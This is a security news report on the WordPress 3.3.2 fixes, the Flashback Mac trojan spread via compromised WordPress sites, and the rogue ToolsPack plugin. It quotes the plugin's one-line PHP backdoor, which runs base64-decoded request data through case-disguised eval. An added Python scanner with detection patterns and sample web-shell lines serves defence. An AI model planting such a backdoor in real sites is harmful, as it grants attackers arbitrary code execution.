WordPress have released an update (version 3.3.2) to address vulnerabilities in the previous version. The update refreshes three bundled external libraries as well as addressing cross-site scripting vulnerabilities:
- Plupload (version 1.5.4), which WordPress uses for uploading media.
- SWFUpload, which WordPress previously used for uploading media, and may still be in use by plugins.
- SWFObject, which WordPress previously used to embed Flash content, and may still be in use by plugins and themes.
WordPress 3.3.2 also addresses:
- Limited privilege escalation where a site administrator could deactivate network-wide plugins when running a WordPress network under particular circumstances.
- Cross-site scripting vulnerability when making URLs clickable.
- Cross-site scripting vulnerabilities in redirects after posting comments in older browsers, and when filtering URLs.
WordPress made no mention on the official release page as to whether this was released specifically to deal with the Mac Flashfake/Flashback Trojan that was spread via infected WordPress blogs.
According to WebSense (via MacWorld UK) up to 100,000 WordPress sites were infected (85% of them in the US).
Some of the sites used to host the attack could have become infected after naïve admins installed a rogue WordPress utility, ToolsPack. This inserted a simple script on the site capable of redirecting vulnerable users to a malware host.
Kaspersky reports that 205,622 Mac users have checked for infection on the flashbackcheck.com website it set up, with 3,624 of these turning out to be infected, a malware rate under 2 percent. The overall infection numbers have declined rapidly since last week.
“Apple is not used to reacting to these kinds of attack,” said Kaspersky researcher, Vincente Diaz.
The company was in the habit of writing its own patches for Java vulnerabilities instead of simply applying those coming from Java overseer, Oracle. In the case of Flashback, this had introduced delays to those patches being applied, he said.
“Mac OS invulnerability is a myth.”
Kaspersky have a very detailed look at the infection's anatomy and how it was spread.
If you manage your own WordPress installation then it is advised that you update to the latest version of WordPress 3.3.2 immediately. If you have also installed the ToolsPack plugin you should remove it.
On February 14 2012, Sucuri wrote about the ToolsPack plugin, which according to its author will “Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!”
Sucuri took a closer look at the plugin code:
<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
// The entire "plugin": if the request carries an "e" parameter, base64-decode it and run it as PHP, otherwise stop.
// The mixed-case eVAl is valid PHP (function names are case-insensitive) but slips past a case-sensitive search for "eval(".
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
They also stated:
If you are not familiar with PHP, this is just a backdoor that allows attackers to execute any code on your site. If you see this plugin installed on your system, remove it right away!
How this plugin got in there is a different question. On some of the compromised websites we noticed it implemented via wp-admin (so stolen passwords), and on others it is being installed via another backdoor.
Removing this plugin will not likely solve your security issues. You have to do a full review of the website – check all your files, update WordPress, change passwords, etc.
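A small detection check for this class of backdoor, added here as an example (it is not Sucuri's or WordPress's code): it scans PHP sources for eval/assert applied to decoded request data, matching case-insensitively because PHP function names are, so the mixed-case eVAl above does not slip past it. The directory layout and sample file contents are constructed.

```python
import re
from pathlib import Path

# Request-controlled superglobals a web shell reads its payload from.
SUPERGLOBALS = r"\$_(?:REQUEST|GET|POST|COOKIE)"
# Decoding layers commonly wrapped around the payload before it is executed.
DECODERS = r"(?:base64_decode|gzinflate|gzuncompress|str_rot13|urldecode|rawurldecode)"

# eval( or assert( -> one or more decoders -> an index into a request superglobal.
# IGNORECASE matters: PHP function names are case-insensitive, so eVAl( is valid PHP
# and a case-sensitive grep for "eval(" would miss the ToolsPack line.
BACKDOOR_PATTERN = re.compile(
    r"\b(?:eval|assert)\s*\(\s*(?:" + DECODERS + r"\s*\(\s*)+" + SUPERGLOBALS + r"\s*\[",
    re.IGNORECASE,
)

def scan_source(source: str, origin: str = "<string>") -> list[dict]:
    """Return one finding per line whose code matches BACKDOOR_PATTERN."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        match = BACKDOOR_PATTERN.search(line)
        if match:
            findings.append({"file": origin, "line": lineno, "code": match.group(0)})
    return findings

def scan_plugin_dir(root: Path) -> list[dict]:
    """Scan every .php file under root (e.g. wp-content/plugins) for the pattern."""
    findings = []
    for path in sorted(root.rglob("*.php")):
        findings.extend(scan_source(path.read_text(errors="replace"), str(path)))
    return findings

# Constructed samples: the ToolsPack line quoted by Sucuri, a re-cased variant with an
# extra decoding layer, and a benign file that decodes request data without executing it.
TOOLSPACK_SAMPLE = """<?php
/*
Plugin Name: ToolsPack
Author: Mark Stain
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
"""
VARIANT_SAMPLE = "<?php\nEVAL ( gzinflate(base64_decode($_POST['x'])) );\n"
BENIGN_SAMPLE = "<?php\n$raw = base64_decode($_POST['payload']);\nupdate_option('x', $raw);\n"

if __name__ == "__main__":
    print(scan_source(TOOLSPACK_SAMPLE, "toolspack"), scan_source(BENIGN_SAMPLE, "benign"))
```

A hit is a lead to review by hand, not proof on its own; as Sucuri notes, the file that planted the plugin is usually a second backdoor, so scan the whole install rather than stopping at the first match.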
Doctor Web said that the process of eliminating Flashback from Macs is proceeding much slower than expected: On Friday, the Russian firm released new data showing that 566,000 active infected machines were counted Thursday and 610,000 counted Wednesday. (See chart below.)